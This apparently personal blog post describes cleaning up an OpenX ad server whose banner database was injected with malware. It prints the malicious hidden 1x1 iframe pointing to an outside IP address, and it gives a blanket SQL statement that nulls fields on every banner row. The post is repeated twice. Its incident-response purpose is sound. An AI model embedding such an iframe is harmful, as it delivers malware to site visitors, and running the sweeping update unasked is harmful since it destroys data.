OpenX – security problem with malware hack

I hit me cold when I saw the virus-scanner’s red message was jumping on the screen. Administering www.weimar.de it is no fun, having a virus-warning on the frontpage of an official website.

The reason was OpenX, Version 2.8.1. which I updated to 2.8.5. – which seemed too late since the database was affected. I got this code within my banner-js:

<"+"iframe src=\"http://194.8.250.211/tds/in.cgi?default\" width=\"1\" height=\"1\" hspace=\"0\" vspace=\"0\" frameborder=\"0\" scrolling=\"no\"><"+"/iframe>

Checking all php-files (no, actually most important these three:

  • /var/yourdomain.conf.php
  • /adjs.php
  • /www/delivery/ajs.php

)

I found nothing. Check it anyway, because in some cases it’s a direct hack within those files (at the very beginning or the end).

So I checked my database , the table phpads_banners (or openx_banners) and found nothing obvious. The malicious code is hidden within the BLOB-fields (which content you can only see if enabled within myPhpAdmin) and therefore there’s one thing you can do: Set the fields:

  • prepend
  • append
  • html_cache
  • html_template

empty!

I rigourously cleared out all the sh*t by doing this simple statement:

UPDATE `my_db`.`phpads_banners` SET `append` = NULL,`prepend` = NULL,`htmltemplate` = NULL, `htmlcache` = NULL WHERE 1;

Good luck!I hit me cold when I saw the virus-scanner’s red message was jumping on the screen. Administering www.weimar.de it is no fun, having a virus-warning on the frontpage of an official website.

The reason was OpenX, Version 2.8.1. which I updated to 2.8.5. – which seemed too late since the database was affected. I got this code within my banner-js:

<"+"iframe src=\"http://194.8.250.211/tds/in.cgi?default\" width=\"1\" height=\"1\" hspace=\"0\" vspace=\"0\" frameborder=\"0\" scrolling=\"no\"><"+"/iframe>

Checking all php-files (no, actually most important these three:

  • /var/yourdomain.conf.php
  • /adjs.php
  • /www/delivery/ajs.php

)

I found nothing. Check it anyway, because in some cases it’s a direct hack within those files (at the very beginning or the end).

So I checked my database , the table phpads_banners (or openx_banners) and found nothing obvious. The malicious code is hidden within the BLOB-fields (which content you can only see if enabled within myPhpAdmin) and therefore there’s one thing you can do: Set the fields:

  • prepend
  • append
  • html_cache
  • html_template

empty!

I rigourously cleared out all the sh*t by doing this simple statement:

UPDATE `web2_db5`.`phpads_banners` SET `append` = NULL,`prepend` = NULL,`htmltemplate` = NULL, `htmlcache` = NULL WHERE 1;

Good luck!